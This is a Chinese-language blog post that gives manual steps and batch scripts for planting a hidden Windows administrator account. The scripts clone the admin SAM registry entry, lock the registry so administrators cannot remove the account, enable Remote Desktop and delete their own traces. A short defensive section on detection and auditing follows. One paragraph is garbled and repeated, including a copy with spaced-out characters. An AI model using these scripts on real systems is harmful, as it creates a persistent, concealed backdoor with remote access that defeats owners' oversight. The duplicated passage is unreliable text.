Windows批處理創建、洗掉隱藏賬戶腳本
一、手動操作
- 新建一個用戶
利用命令列直接輸或者做成批處理程式具體內容如下:
@echo off
net user godyang$ 123456 /add
net localgroup administrators godyang$ /add
pause
運行結果如圖:
可以看到通過net user 指令是無法看到新建的用戶的,
但是通過控制面板和切換賬戶可以發現新建的賬戶,這并沒有達到隱藏的要求,
所以接下來的作業就是將這兩個地方賬戶顯示隱藏,
- 修改注冊表
點擊"開始"→"運行",輸入regedit,打開注冊表編輯器
HKEY_LOCAL_MACHINE\SAM\SAM 進入這里,需要更改下權限,讓當前賬戶有權限修改,
修改完成后重新進入注冊表
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Name這里看到所有賬戶的名稱,
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ 這里的字串對應下面的賬戶名,只是他存盤的是賬戶資訊和權限,
首先將name中地godyang 導 出 , 再 去 查 看 a d m i n 與 新 建 賬 戶 的 字 符 串 值 , 并 把 它 導 出 來 , 如 圖 分 別 是 0 X 1 F 4 , 0 X 3 E D , 分 別 為 a d m i n . r e g , u e s r . r e g , 并 將 a d m i n 中 的 F 值 復 制 到 u s e r . r e g 中 , 做 這 一 步 的 原 因 是 完 成 管 理 員 信 息 的 克 隆 , 來 為 隱 藏 用 戶 獲 得 管 理 員 權 限 , 接 下 來 將 u s e r . r e g 與 g o d y a n g . r e g 導 入 , 就 完 成 了 隱 藏 用 戶 的 創 建 , 這 是 控 制 面 板 已 經 找 不 到 賬 戶 g o d y a n g 匯出,再去查看admin與新建賬戶的字串值,并把它匯出來,如圖分別是0X1F4,0X3ED,分別為admin.reg,uesr.reg,并將admin中的F值復制到user.reg中,做這一步的原因是完成管理員資訊的克隆,來為隱藏用戶獲得管理員權限,接下來將user.reg與godyang.reg匯入,就完成了隱藏用戶的創建,這是控制面板已經找不到賬戶godyang 導出,再去查看admin與新建賬戶的字符串值,并把它導出來,如圖分別是0X1F4,0X3ED,分別為admin.reg,uesr.reg,并將admin中的F值復制到user.reg中,做這一步的原因是完成管理員信息的克隆,來為隱藏用戶獲得管理員權限,接下來將user.reg與godyang.reg導入,就完成了隱藏用戶的創建,這是控制面板已經找不到賬戶godyang了,
通過net user指令也無法列出該賬戶
計算機管理-本機用戶和組-用戶也無法列出該賬戶
但可以通過以下指令可查看:
Net user godyang$
但是這中情況是相對安全的,因為用戶又不知道我們叫啥,
還有一種查看的方法就是通過注冊表,為了保證賬不被管理員清理還需要對【HKEY_LOCAL_MACHINE\SAM\SAM】注冊表項的權限取消,這樣經驗不足即使管理員發現了賬戶,也束手無策,
二、批處理檔案
上述所述只是一種通過圖形化界面進行隱藏用戶創建的方法,這種方法耗費的時間太多,我們需要的是一種快速的工具,所以我們接下來用批處理程式來完成上述對賬戶隱藏的操作,結合批處理陳述句,以及上述步驟,我們可以撰寫如下批處理程式,只要問題發生在F下值的覆寫上,由于能力有限,實在沒能找到能覆寫的方法,通過網上收集資料,找到了下面的解決方案,下面是原始碼(當然后面的注釋要刪):
net user godyang$ 123456
net localgroup administrators godyang$ /add
reg export HKEY\_LOCAL\_MACHINE\SAM\SAM\Domains\Account\Users
c:\1.reg
net user admin$ del
reg import c:\1.reg
del c:\1.reg
del 1.bat
但是這種簡單的方法是有缺陷的,就是沒有管理員沒有注冊表的權限,可能會被拒絕服務,所以下一步應該是通過組態檔給權限,除此之外還應該擦除痕跡,
修改方案如下:
net user godyang$ 1234566 /add
net localgroup administrators godyang$ /add
Echo HKEY\_LOCAL\_MACHINE\SAM [1] \>\>c:/tem.ini
Echo HKEY\_LOCAL\_MACHINE\SAM\SAM [1] \>\>c:/tem.ini
Echo HKEY\_LOCAL\_MACHINE\SAM\SAM\Domains [1] \>\>c:/tem.ini
Echo HKEY\_LOCAL\_MACHINE\SAM\SAM\Domains\Account [1] \>\>c:/tem.ini
Echo HKEY\_LOCAL\_MACHINE\SAM\SAM\Domains\Account\Users [1] \>\>c:/tem.ini
Echo HKEY\_LOCAL\_MACHINE\SAM\SAM\Domains\Account\Users\Names [1] \>\>c:/tem.ini
regini c:/tem.ini
regedit /e c:\1.reg HKEY\_LOCAL\_MACHINE\SAM\SAM\Domains\Account\Users
net user godyang$ /del
regedit /s c:\1.reg
Echo HKEY\_LOCAL\_MACHINE\SAM\SAM\Domains\Account\Users\Names [0] \>c:/tem.ini
Echo HKEY\_LOCAL\_MACHINE\SAM\SAM\Domains\Account\Users [0] \>\>c:/tem.ini
Echo HKEY\_LOCAL\_MACHINE\SAM\SAM\Domains\Account [0] \>\>c:/tem.ini
Echo HKEY\_LOCAL\_MACHINE\SAM\SAM\Domains [0] \>\>c:/tem.ini
Echo HKEY\_LOCAL\_MACHINE\SAM\SAM [0] \>\>c:/tem.ini
Echo HKEY\_LOCAL\_MACHINE\SAM\ [0] \>\>c:/tem.ini
regini c:/tem.ini
del c:\tem.ini
del c:\1.reg
del 1.bat
【代碼分析】:
前兩句代碼進行創建賬戶、提權的操作
而其后大量的Echo操作則是進行組態檔的形成,以獲取對注冊表的控制權限,
中間部分的reg的及用戶洗掉操作,基本與手動操作保持一致,主要是進行管理員權限的復制
剩余的部分則是痕跡的擦除,首先是對注冊表權限的還原,然后是對程序中創建的檔案進行洗掉,
上圖可以表明用戶已創建
上述腳本與前面操作基本一致,比起手動操作速度更快,而且能夠完成一些消除痕跡的操作,安全系數大大提高,基本能夠完成作業要求,
【一點拓展】:
題目還要求要遠程登錄,那就順便開個遠程桌面的服務,代碼如下:
只需將一下代碼加在消除痕跡代碼的前面,即可完成遠程桌面的開啟,
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
(fDenyTSConnections沒開遠程桌面的值是1,開是0)
【防護措施】:
1、添加符號型隱藏賬戶
對于這類隱藏賬戶的檢測比較簡單,一般黑客在利用這種方法建立完隱藏賬戶后,會把隱藏賬戶提升為管理員權限,那么我們只需要在"命令提示符"中輸入"net localgroup administrators"就可以讓所有的隱藏賬戶現形,如果嫌麻煩,可以直接打開"計算機管理"進行查看,添加"$"符號的賬戶是無法在這里隱藏的,
2、修改注冊表型隱藏賬戶
由于使用這種方法隱藏的賬戶是不會在"命令提示符"和"計算機管理"中看到的,因此可以到注冊表中洗掉隱藏賬戶,來到"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names",把這里存在的賬戶和"計算機管理"中存在的賬戶進行比較,多出來的賬戶就是隱藏賬戶了,想要洗掉它也很簡單,直接洗掉以隱藏賬戶命名的項即可,
3、無法看到名稱的隱藏賬戶
如果黑客制作了一個修改注冊表型隱藏賬戶,在此基礎上洗掉了管理員對注冊表的操作權限,那么管理員是無法通過注冊表洗掉隱藏賬戶的,甚至無法知道黑客建立的隱藏賬戶名稱,不過世事沒有絕對,我們可以借助"組策略"的幫助,讓黑客無法通過隱藏賬戶登陸,點擊"開始"→"運行",輸入"gpedit.msc"運行"組策略",依次展開"計算機配置"→"Windows 設定"→"安全設定"→"本地策略"→"審核策略",雙擊右邊的"審核策略更改",在彈出的設定視窗中勾選"成功",然后點"確定",對"審核登陸事件"和"審核程序追蹤"進行相同的設定,
4、開啟登陸事件審核功能
進行登陸審核后,可以對任何賬戶的登陸操作進行記錄,包括隱藏賬戶,這樣我們就可以通過"計算機管理"中的"事件查看器"準確得知隱藏賬戶的名稱,甚至黑客登陸的時間,即使黑客將所有的登陸日志洗掉,系統還會記錄是哪個賬戶洗掉了系統日志,這樣黑客的隱藏賬戶就暴露無疑了,
5.通過事件查看器找到隱藏帳戶
得知隱藏賬戶的名稱后就好辦了,但是我們仍然不能洗掉這個隱藏賬戶,因為我們沒有權限,但是我們可以在"命令提示符"中輸入"net user 隱藏賬戶名稱 654321"更改這個隱藏賬戶的密碼,這樣這個隱藏賬戶就會失效,黑客無法再用這個隱藏賬戶登陸,
【轉載請注明出處】:
https://www.jb51.net/article/30078.htm
https://blog.csdn.net/lql971203/article/details/84451028
https://blog.csdn.net/qq_39783194/article/details/113953591
https://www.jb51.net/article/19249.htm
https://blog.csdn.net/abcd51685168/article/details/41854981?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-7.control&dist_request_id=ac5fac8a-307d-43ef-a93f-495cb97a14af&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-7.control
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/264443.html
標籤:其他